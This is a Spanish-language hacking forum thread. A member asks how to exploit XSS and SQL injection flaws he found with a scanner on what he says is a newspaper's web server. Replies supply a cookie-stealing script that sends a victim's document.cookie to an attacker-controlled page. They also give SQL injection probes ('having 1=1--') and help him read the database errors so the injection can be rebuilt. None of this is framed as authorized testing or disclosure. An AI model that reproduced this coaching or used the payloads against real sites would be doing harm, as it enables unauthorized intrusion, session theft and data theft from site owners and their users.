Páginas: [1] 
|
 |
|
 Autor
|
Tema: xss encontrado en web(como sacar provecho?) (Leído 847 veces)
|
Tengu
 Desconectado
Mensajes: 247
Lets play my game. Lets Hack!!!!
|
hola eh encontrado la siguiente falla en una web y tal vez esta web sirva como ejemplo para poder explicar la explotacion de un bug de alta importancia,para asi poder aprender de forma practica, asi q espero coolaboracion para que los q realmente saben y si no les molesta instruyan de su conocimiento a un monton de newbies igualmente desde ya se agredece su colaboracion.
bug:con acunetix aparece el mensaje de 11 xss en el index.php
Attack details
The GET variable nuevo_ano has been set to >"><ScRiPt%20%0a%0d>alert(1981921819)%3B</ScRiPt>.
espero su ayuda y conocimiento para liberar la informacion jej salu25
|
|
|
|
|
En línea
|
 Existen Hombres muy poderosos, y cada hombre tiene sus secretos, toma en tus manos a los secretos de hombre y tendras al hombre, y si tienes al hombre en tus manos entonces Tambien Tendras su poder... |
|
|
|
Azielito
|
Pues ahí te dice donde esta la vuln [...] Busca mas abajo del foro (creo que en documentacion) sobre 'los poderes secretos de XSS' escrito por SDC y las dudas que tengas ya se vera la respuesta  |
|
|
|
|
En línea
|
|
|
|
wizache
Desconectado
Mensajes: 142
El que poco sabe poco vive
|
Que tipo de web es??, tienes algun usuario en esa web,
Algo muy util es robarte es el robo de cookies, osea hacr algo como document.location="tuserver/robacokies.php?cookie="document.cookie t hacer que otro usuario entre al link
Los usos son bastantes, pero todo depende de la pagina con el bug
Saludos
|
|
|
|
|
En línea
|
|
|
|
|
berz3k
|
si fuese un foro, un banco o un lugar donde esten registrados users, seria interesante explotar el XSS, aunque hay otras tecnicas interesantes como el documento que saco sdc para explotar dichos bugs.
-berz3k.
|
|
|
|
|
En línea
|
|
|
|
Tengu
Desconectado
Mensajes: 247
Lets play my game. Lets Hack!!!!
|
gracias por interesarse en ayudarme, ya estuve siguiendo los consejos y me adentre en el tema, el bug pertenece al servidor de un diario corriendo un Microsoft-iis/5.0 el cual posee unas 26 vulnerabilidades de xss y 5 de sql injection. Lo que estudie a fondo fue el tema del xss pero logre descubrir que se trata de un xss ocal,es decir que el script no llega al servidor sino que solo se injecta codigo en el navegador lo que seria util pero solo si se mandara el link maliciosamente modificado a un usuario para ejecutar codigo. pero como dije antes ,no es posible una injeccion del tipo 2 en el formulario del servidor. Tembien tiene WebDav activado, y la vulnerabilidad en sql afecta a http://www.vulnerable.com:80/search.asp?bqd=111-222-1933email@address.com&oper=' uds. diganme que les parece. salud25 y otra vez GRacias |
|
|
|
|
En línea
|
Existen Hombres muy poderosos, y cada hombre tiene sus secretos, toma en tus manos a los secretos de hombre y tendras al hombre, y si tienes al hombre en tus manos entonces Tambien Tendras su poder... |
|
|
wizache
Desconectado
Mensajes: 142
El que poco sabe poco vive
|
Esa vulnerabilidad de sql injection que dices esta mucho mas interesante, que tal mandas el tipo de error que regresa para ver en que se te puede ayudar, por lo prondo puedes intentar enviar: oper='having 1=1-- o sin la comilla oper=5 having 1=1--, si te devuelve algo como: 'tabla.columna' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause., puedes hacer muchas cosas interesantes
SAludos
|
|
|
|
|
En línea
|
|
|
|
Tengu
Desconectado
Mensajes: 247
Lets play my game. Lets Hack!!!!
|
la respuesta q devuelve es
Microsoft OLE DB Provider for ODBC Drivers error '80040e21'
El controlador ODBC no admite las propiedades solicitadas.
/search.asp, line 106
|
|
|
|
|
En línea
|
Existen Hombres muy poderosos, y cada hombre tiene sus secretos, toma en tus manos a los secretos de hombre y tendras al hombre, y si tienes al hombre en tus manos entonces Tambien Tendras su poder... |
|
|
wizache
Desconectado
Mensajes: 142
El que poco sabe poco vive
|
mm. ese error es nuevo para mi, siempre te regresa el error?, o en que casos, otra pregunta, el tipo de valor que toma "oper" por defecto cual es? una cadena o un entero
|
|
|
|
|
En línea
|
|
|
|
Tengu
Desconectado
Mensajes: 247
Lets play my game. Lets Hack!!!!
|
si9 alguien logra saber a que se debe este error porfavor haganmelo saber jej
|
|
|
|
|
En línea
|
Existen Hombres muy poderosos, y cada hombre tiene sus secretos, toma en tus manos a los secretos de hombre y tendras al hombre, y si tienes al hombre en tus manos entonces Tambien Tendras su poder... |
|
|
yeikos
Colaborador
Desconectado
Mensajes: 1.363
|
la respuesta q devuelve es
Microsoft OLE DB Provider for ODBC Drivers error '80040e21'
El controlador ODBC no admite las propiedades solicitadas.
/search.asp, line 106
Ese error se debe a que la sintaxis de la consulta es incorrecta, prueba a reconstruirla de nuevo siguiendo los consejos que te dió wizache. |
|
|
|
|
En línea
|
|
|
|
|
|
|
Páginas: [1] 
|
|
|
 |
